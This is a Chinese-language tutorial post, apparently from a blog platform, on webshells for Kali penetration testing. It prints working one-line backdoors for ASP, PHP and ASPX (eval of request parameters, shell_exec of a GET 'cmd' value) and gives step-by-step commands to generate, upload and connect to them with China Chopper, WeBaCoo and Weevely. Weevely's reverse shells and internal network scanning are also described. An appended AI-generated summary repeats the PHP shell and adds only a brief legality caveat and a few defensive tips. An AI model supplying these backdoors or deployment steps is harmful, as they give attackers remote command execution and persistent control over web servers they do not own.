kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)

本文介绍了一句话木马的原理及使用方法,包括中国菜刀、WeBaCoo和Weevely等工具,涉及ASP、PHP、ASP.NET等多种平台的木马部署技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本质 : 上传一句话木马

<?php echo shell_exec($_GET[‘cmd‘]);?>

windows平台

中国菜刀

支持asp、php、asp.net和jsp等
可能被IDS、AV、WAF、扫描器软件发现查杀

使用方法:
  1. 往目标web服务器上传相应的一句话木马

asp一句话木马:

<%execute(request("pass"))%>

php一句话木马:

<?php @eval($_POST[pass]);?>

aspx一句话木马:

<%@ Page Language="Jscript"%>

<%eval(Request.Item["pass"])%>
  1. 打开中国菜刀,输入网址和密码(一句话木马中的参数) 连接服务端
    这里写图片描述

Linux平台

获取的是类终端的shell
通信内容base64编码后通过cookie头传输,隐蔽性较强
缺点是不能指定密码

cookie中的参数
  • cm: base64编码的命令

  • cn: 服务器用于返回数据的cookie头的名

  • cp: 返回信息定界符

使用方法

1、生成服务器端

wenacoo -g -o a.php

2、上传后用客户端进行连接

webacoo -t -u http://1.1.1.1/a.php

Weevely(只支持PHP)

  • 用http头进行指令传输
  • 隐蔽的类终端PHP Webshell
  • 有30多个管理模块

    • 执行系统命令、浏览文件系统

    • 检查服务器常见配置错误

    • 创建正向、反向TCP Shell连接

    • 通过目标计算机代理HTTP流量

    • 从目标计算机运行端口扫描,渗透内网

  • 支持连接密码

使用方法

1、生成服务端

weevely generate <password> b.php

生成的文件在 /usr/share/weevely/ 目录下

2、 连接客户端

weevely <URL> <password>

3、 输入help查看模块
这里写图片描述

### Kali Linux 中 PHP 一句话木马的使用与解释 在 Web 渗透测试领域,PHP 一句话木马是一种常见的攻击手段。这类恶意脚本通常非常简洁,能够绕过某些安全检测机制并提供远程命令执行功能。 #### 什么是 PHP 一句话木马? PHP 一句话木马是指一段极短的 PHP 代码,这段代码可以被嵌入到目标服务器上的合法网页文件中,从而允许攻击者通过 HTTP 请求向该页面发送特定参数来触发隐藏的功能。最简单的形式如下: ```php <?php @eval($_POST['cmd']);?> ``` 此段代码的作用是在接收到 POST 请求中的 `cmd` 参数后立即对其进行评估并执行相应的操作[^1]。 #### 如何利用 Kali Linux 部署和管理这些工具? 对于渗透测试人员来说,在获得对某台主机的部分控制权之后,可能会考虑上传此类小型后门程序以便进一步探索内部网络环境或维持长期访问权限。具体做法可能涉及以下几个方面的工作流程: - 构建自定义的有效载荷(Payload),其中就包含了上述提到的一句话木马逻辑; - 将生成好的 shellcode 注入到目标应用程序内; - 利用 curl/wget 等命令行工具提交数据给已植入木马的目标站点; 需要注意的是,实际应用过程中应当遵循法律法规的要求,并仅限于授权范围内的演练活动之中[^2]。 #### 安全防护措施建议 为了防止成为这种类型的攻击受害者,网站管理员应该采取必要的预防措施加强系统的安全性: - 定期审查所有托管的内容及其变更记录; - 对上传至 webroot 下的新文件实施严格的验证过程; - 应用最新的补丁修复已知的安全缺陷;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值